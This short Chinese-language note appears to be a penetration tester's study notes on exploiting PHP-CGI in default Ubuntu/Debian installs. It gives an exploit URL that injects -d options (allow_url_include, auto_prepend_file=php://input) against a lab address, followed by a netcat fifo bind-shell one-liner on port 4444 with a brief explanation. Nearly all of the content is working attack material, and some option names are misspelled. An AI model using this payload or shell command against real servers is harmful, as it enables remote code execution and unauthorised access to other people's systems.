2 默认安装-Ubuntu/Debian默认安装cgi模块（在php代码里面使用cgi就可以直接执行系统命令 方便程序员操作）
php存在另一个目录 不再网页主目录 爬网爬不出
Ubuntu/Debian默认安装PHP5-cgi
可直接访问/cgi-bin/php5和/cgi-bin/php（爬不出的目录）
http://192.168.56.101/cgi-bin/php?-d+allow_url_inlcude=on+-d+ disable_funtions="" -d open_basedir=none -d auto_prepend_file=dphp://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
让服务器主动打开端口 去侦听 然后拿shell
mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
mk一个fifo（放在/tmp/pipe）进行管道到/tmp/pipe 又sh /tmp/pipe